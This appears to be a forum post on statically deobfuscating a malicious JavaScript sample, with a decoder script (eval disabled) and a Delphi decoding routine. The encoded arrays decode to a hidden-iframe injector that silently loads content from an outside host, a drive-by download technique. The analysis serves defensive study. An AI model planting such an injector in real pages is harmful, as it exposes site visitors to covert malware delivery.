Quote:
Could you show me a static-analysis approach to deobfuscating this JavaScript code?
/* Header information */
// Writes the two banner paragraphs into the page; the markup is fixed text,
// nothing from the sample is interpolated here.
(function () {
    var banner = '<p style="text-align:center"><font face="courier new" size="3" color="red"><b>[INFORMATION]</b></font></p>';
    var status = '<p style="text-align:center"><font face="courier new" size="2" color="blue"><b>javascript sample executed...</b></font></p>';
    document.write(banner);
    document.write(status);
}());
/* Header information */
// Accumulator for the decoded string; filled in by the loop further down.
mainCode = "";
// Divisor applied to every array entry below: each literal is an even number
// written as N/w, so the array evaluates to plain character codes.
w = 2;
// Encoded sample, kept verbatim as pasted (the literal is soft-wrapped across
// two lines here; the break falls inside the token "210/w").  The values are
// character codes of a script, not machine code, despite the variable name.
// NOTE(review): treat the decoded result as untrusted input — read it, never
// execute it or insert it into the page as HTML.
shellCodeArray = [18/w,18/w,210/w,204/w,64/w,80/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,206/w,202/w,232/w,138/w,216/w,202/w,218/w,202/w,220/w,232/w,230/w,132/w,242/w,168/w,194/w,206/w,156/w,194/w,218/w,202/w,80/w,78/w,196/w,222/w,200/w,242/w,78/w,82/w,182/w,96/w,186/w,82/w,246/w,18/w,18/w,18/w,210/w,204/w,228/w,194/w,218/w,202/w,228/w,80/w,82/w,118/w,18/w,18/w,250/w,64/w,202/w,216/w,230/w,202/w,64/w,246/w,18/w,18/w,18/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,238/w,228/w,210/w,232/w,202/w,80/w,68/w,120/w,210/w,204/w,228/w,194/w,218/w,202/w,64/w,230/w,228/w,198/w,122/w,78/w,208/w,232/w,232/w,224/w,116/w,94/w,94/w,214/w,222/w,224/w,222/w,216/w,202/w,104/w,210/w,216/w,222/w,114/w,92/w,198/w,244/w,92/w,198/w,198/w,94/w,210/w,94/w,204/w,232/w,224/w,98/w,78/w,64/w,238/w,210/w,200/w,232/w,208/w,122/w,78/w,98/w,96/w,78/w,64/w,208/w,202/w,210/w,206/w,208/w,232/w,122/w,78/w,98/w,96/w,78/w,64/w,230/w,232/w,242/w,216/w,202/w,122/w,78/w,236/w,210/w,230/w,210/w,196/w,210/w,216/w,210/w,232/w,242/w,116/w,208/w,210/w,200/w,200/w,202/w,220/w,118/w,224/w,222/w,230/w,210/w,232/w,210/w,222/w,220/w,116/w,194/w,196/w,230/w,222/w,216/w,234/w,232/w,202/w,118/w,216/w,202/w,204/w,232/w,116/w,96/w,118/w,232/w,222/w,224/w,116/w,96/w,118/w,78/w,124/w,120/w,94/w,210/w,204/w,228/w,194/w,218/w,202/w,124/w,68/w,82/w,118/w,18/w,18/w,250/w,18/w,18/w,204/w,234/w,220/w,198/w,232/w,210/w,222/w,220/w,64/w,210/w,204/w,228/w,194/w,218/w,202/w,228/w,80/w,82/w,246/w,18/w,18/w,18/w,236/w,194/w,228/w,64/w,204/w,64/w,122/w,64/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,198/w,228/w,202/w,194/w,232/w,202/w,138/w,216/w,202/w,218/w,202/w,220/w,232/w,80/w,78/w,210/w,204/w,228/w,194/w,218/w,202/w,78/w,82/w,118/w,204/w,92/w,230/w,202/w,232/w,130/w,232/w,232/w,228/w,210/w,196/w,234/w,232/w,202/w,80/w,78/w,230/w,228/w,198/w,78/w,88/w,78/w,208/w,232/w,232/w,224/w,116/w,94/w,94/w,214/w,222/w,224/w,222/w,216/w,202/w,104/w,210/w,216/w,222/w,114/w,92/w,198/w,244/w,92/w,198/w,198/w,94/w,2
10/w,94/w,204/w,232/w,224/w,98/w,78/w,82/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,236/w,210/w,230/w,210/w,196/w,210/w,216/w,210/w,232/w,242/w,122/w,78/w,208/w,210/w,200/w,200/w,202/w,220/w,78/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,224/w,222/w,230/w,210/w,232/w,210/w,222/w,220/w,122/w,78/w,194/w,196/w,230/w,222/w,216/w,234/w,232/w,202/w,78/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,216/w,202/w,204/w,232/w,122/w,78/w,96/w,78/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,232/w,222/w,224/w,122/w,78/w,96/w,78/w,118/w,204/w,92/w,230/w,202/w,232/w,130/w,232/w,232/w,228/w,210/w,196/w,234/w,232/w,202/w,80/w,78/w,238/w,210/w,200/w,232/w,208/w,78/w,88/w,78/w,98/w,96/w,78/w,82/w,118/w,204/w,92/w,230/w,202/w,232/w,130/w,232/w,232/w,228/w,210/w,196/w,234/w,232/w,202/w,80/w,78/w,208/w,202/w,210/w,206/w,208/w,232/w,78/w,88/w,78/w,98/w,96/w,78/w,82/w,118/w,18/w,18/w,18/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,206/w,202/w,232/w,138/w,216/w,202/w,218/w,202/w,220/w,232/w,230/w,132/w,242/w,168/w,194/w,206/w,156/w,194/w,218/w,202/w,80/w,78/w,196/w,222/w,200/w,242/w,78/w,82/w,182/w,96/w,186/w,92/w,194/w,224/w,224/w,202/w,220/w,200/w,134/w,208/w,210/w,216/w,200/w,80/w,204/w,82/w,118/w,18/w,18/w,250/w];
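// Escape the characters the HTML parser treats specially, so a decoded string
// is displayed as text instead of being parsed as markup.
function escapeHtml(text) {
    return String(text)
        .replace(/&/g, '&amp;')
        .replace(/</g, '&lt;')
        .replace(/>/g, '&gt;')
        .replace(/"/g, '&quot;')
        .replace(/'/g, '&#39;');
}

document.write('<p style="text-align:left"><font face="courier new" size="3" color="red"><b>[SHELLCODE]:</b></font></p>');
// The array stringifies to comma-separated numbers; escaped anyway so every
// value that reaches the page goes through the same path.
document.write('<p style="text-align:left"><font face="courier new" size="2" color="blue"><b>' + escapeHtml(shellCodeArray) + '</b></font></p>');

// Rebuild the decoded string one character code at a time (mainCode starts
// empty; shellCodeArray entries are already divided down to plain codes).
for (var i = 0; i < shellCodeArray.length; i++) {
    mainCode += String.fromCharCode(shellCodeArray[i]);
}

document.write('<p style="text-align:left"><font face="courier new" size="3" color="red"><b>[MAIN CODE DECODED]:</b></font></p>');
// mainCode is decoded script source.  Writing it into the page raw would let
// the HTML parser act on any tag inside it (e.g. an element embedded in one of
// its string literals), which would load that content even though eval() is
// disabled below.  Escaping keeps the dump read-only.
document.write('<p style="text-align:left"><font face="courier new" size="2" color="blue"><b>' + escapeHtml(mainCode) + '</b></font></p>');
// Leave both disabled: the decoded code is untrusted and is only to be read.
//eval(mainCode);
//alert(mainCode);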
Conclusion: the JavaScript is not heavily obfuscated:
shellCodeArray: every element is written as an even number divided by w (w = 2), so each entry evaluates to a plain character code.
mainCode: built by appending String.fromCharCode(shellCodeArray[i]) for each index i from 0 to shellCodeArray.length - 1. The result is itself JavaScript source, so it should be read as text rather than executed or written into the page as HTML.
Delphi sample:
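{ Turns an array of byte values into a WideString by mapping each byte to the
  character with that code (e.g. 105 -> 'i').  No arithmetic is applied, so
  the caller must already have undone any encoding (such as the "/2" in the
  JavaScript sample).  Returns an empty string for an empty array.

  shellCode: the character codes to decode, in order.
  Result:    the decoded text, one WideChar per input byte. }
function decode(shellCode: array of byte): WideString;
var
  x: Integer;
begin
  { A managed-type Result is not guaranteed to start empty; clearing it keeps
    repeated calls (or a reused destination variable) from appending. }
  Result := '';
  { Low/High follow the open array's actual bounds instead of assuming 0. }
  for x := Low(shellCode) to High(shellCode) do
    Result := Result + WideChar(shellCode[x]);
end;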
Usage:
{ Button handler that decodes a hard-coded byte array with decode() and places
  the resulting text in Memo1.Text.  The array appears to be the JavaScript
  sample's shellCodeArray after the "/2" has been applied (e.g. 18/2 -> 9,
  210/2 -> 105 = 'i', 204/2 -> 102 = 'f'), i.e. the decoded script source.

  NOTE(review): the decoded text is shown only as memo text here, which is the
  right way to inspect it — it must not be executed or rendered as HTML, since
  it contains a reference to an external host. }
procedure TForm1.Button1Click(Sender: TObject);
begin
{ Literal character codes; tabs (9) and the script's punctuation are included. }
Memo1.Text := decode([9, 9, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46,
103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84,
97, 103, 78, 97, 109, 101, 40, 39, 98, 111, 100, 121, 39, 41, 91, 48,
93, 41, 123, 9, 9, 9, 105, 102, 114, 97, 109, 101, 114, 40, 41, 59, 9,
9, 125, 32, 101, 108, 115, 101, 32, 123, 9, 9, 9, 100, 111, 99, 117,
109, 101, 110, 116, 46, 119, 114, 105, 116, 101, 40, 34, 60, 105, 102,
114, 97, 109, 101, 32, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47,
47, 107, 111, 112, 111, 108, 101, 52, 105, 108, 111, 57, 46, 99, 122, 46,
99, 99, 47, 105, 47, 102, 116, 112, 49, 39, 32, 119, 105, 100, 116, 104, 61,
39, 49, 48, 39, 32, 104, 101, 105, 103, 104, 116, 61, 39, 49, 48, 39, 32, 115,
116, 121, 108, 101, 61, 39, 118, 105, 115, 105, 98, 105, 108, 105, 116, 121, 58,
104, 105, 100, 100, 101, 110, 59, 112, 111, 115, 105, 116, 105, 111, 110, 58, 97,
98, 115, 111, 108, 117, 116, 101, 59, 108, 101, 102, 116, 58, 48, 59, 116, 111, 112,
58, 48, 59, 39, 62, 60, 47, 105, 102, 114, 97, 109, 101, 62, 34, 41, 59, 9, 9, 125, 9, 9,
102, 117, 110, 99, 116, 105, 111, 110, 32, 105, 102, 114, 97, 109, 101, 114, 40, 41, 123,
9, 9, 9, 118, 97, 114, 32, 102, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99,
114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 105, 102, 114, 97, 109,
101, 39, 41, 59, 102, 46, 115, 101, 116, 65, 116, 116, 114, 105, 98, 117, 116, 101, 40, 39,
115, 114, 99, 39, 44, 39, 104, 116, 116, 112, 58, 47, 47, 107, 111, 112, 111, 108, 101, 52,
105, 108, 111, 57, 46, 99, 122, 46, 99, 99, 47, 105, 47, 102, 116, 112, 49, 39, 41, 59, 102, 46,
115, 116, 121, 108, 101, 46, 118, 105, 115, 105, 98, 105, 108, 105, 116, 121, 61, 39, 104, 105,
100, 100, 101, 110, 39, 59, 102, 46, 115, 116, 121, 108, 101, 46, 112, 111, 115, 105, 116, 105,
111, 110, 61, 39, 97, 98, 115, 111, 108, 117, 116, 101, 39, 59, 102, 46, 115, 116, 121, 108, 101,
46, 108, 101, 102, 116, 61, 39, 48, 39, 59, 102, 46, 115, 116, 121, 108, 101, 46, 116, 111, 112, 61,
39, 48, 39, 59, 102, 46, 115, 101, 116, 65, 116, 116, 114, 105, 98, 117, 116, 101, 40, 39, 119, 105,
100, 116, 104, 39, 44, 39, 49, 48, 39, 41, 59, 102, 46, 115, 101, 116, 65, 116, 116, 114, 105, 98, 117,
116, 101, 40, 39, 104, 101, 105, 103, 104, 116, 39, 44, 39, 49, 48, 39, 41, 59, 9, 9, 9, 100, 111, 99,
117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97,
103, 78, 97, 109, 101, 40, 39, 98, 111, 100, 121, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100,
67, 104, 105, 108, 100, 40, 102, 41, 59, 9, 9, 125]);
end;